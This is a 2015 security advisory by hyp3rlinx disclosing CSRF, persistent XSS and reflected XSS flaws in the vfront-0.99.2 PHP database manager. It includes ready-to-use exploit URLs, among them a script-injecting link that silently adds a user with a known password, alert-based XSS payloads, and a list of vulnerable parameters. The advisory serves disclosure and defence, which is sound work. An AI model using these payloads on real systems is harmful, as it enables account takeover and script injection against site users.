[+] Credits: John Page ( hyp3rlinx )

[+] Domains: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/AS-VFRONT0602.txt



Vendor:
==============
www.vfront.org



Product:
===================================================================================
vfront-0.99.2 is a PHP web based MySQL & PostgreSQL database management application.



Advisory Information:
====================================
CSRF, Persistent XSS & reflected XSS



Vulnerability Detail(s):
=======================


CSRF:
=========
No CSRF token in place, therefore we can add arbitrary users to the system.


Persistent XSS:
================
variabili.php has multiple XSS vectors using POST method, one input field 'altezza_iframe_tabella_gid' will store XSS payload
into the MySQL database which will be run each time variabili.php is accessed from victims browser.


Persisted XSS stored in MySQL DB:
=================================
DB-----> vfront_vfront
TABLE-----> variabili
COLUMN------> valore (will contain our XSS)


Exploit code(s):
===============


CSRF code add arbitrary users to system:
=======================================
http://localhost/vfront-0.99.2/vfront-0.99.2/admin/log.php?op="/><script>var xhr%3dnew XMLHttpRequest();xhr.onreadystatechange%3dfunction(){if(xhr.status%3d%3d200){if(xhr.readyState%3d%3d4){alert(xhr.responseText);}}};xhr.open('POST','utenze.db.php?insert_new',true);xhr.setRequestHeader('Content-type','application/x-www-form-urlencoded');xhr.send('nome%3dhyp3rlinxe%26cognome%3dapparitionsec%26email%3dx@x.com%26passwd%3dhacked%26passwd1%3dhacked');</script>&tabella=&uid=&data_dal=All&data_al=All



Persistent XSS:
================
http://localhost/vfront-0.99.2/vfront-0.99.2/admin/variabili.php?feed=0&gidfocus=0
Inject XSS into 'the altezza_iframe_tabella_gid' input field to store in database.
"/><script>alert(666)</script>



Reflected XSS(s):
=================
http://localhost/vfront-0.99.2/vfront-0.99.2/admin/query_editor.php?id=&id_table=&id_campo="/><script>alert(666)</script>



XSS vulnerable input fields:
============================
http://localhost/vfront-0.99.2/vfront-0.99.2/admin/variabili.php
altezza_iframe_tabella_gid   <------------- ( Persistent XSS )
passo_avanzamento_veloce_gid
n_record_tabella_gid
search_limit_results_gid
max_tempo_edit_gid
home_redirect_gid
formati_attach_gid
default_group_ext_gid
cron_days_min_gid

  

Disclosure Timeline:
===================================


Vendor Notification: May 31, 2015
June 2, 2015 : Public Disclosure



Severity Level:
===================================
High



Description:
==========================================================

Request Method(s):
                                [+]  GET & POST

Vulnerable Product:
                                [+]  vfront-0.99.2

Vulnerable Parameter(s):
                                [+] altezza_iframe_tabella_gid
				    passo_avanzamento_veloce_gid
				    n_record_tabella_gid
				    search_limit_results_gid
				    max_tempo_edit_gid
				    home_redirect_gid
				    formati_attach_gid
				    default_group_ext_gid
				    cron_days_min_gid
				    id_campo
				    op
				   


Affected Area(s):               [+]  Admin & MySQL DB

===============================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.


(hyp3rlinx)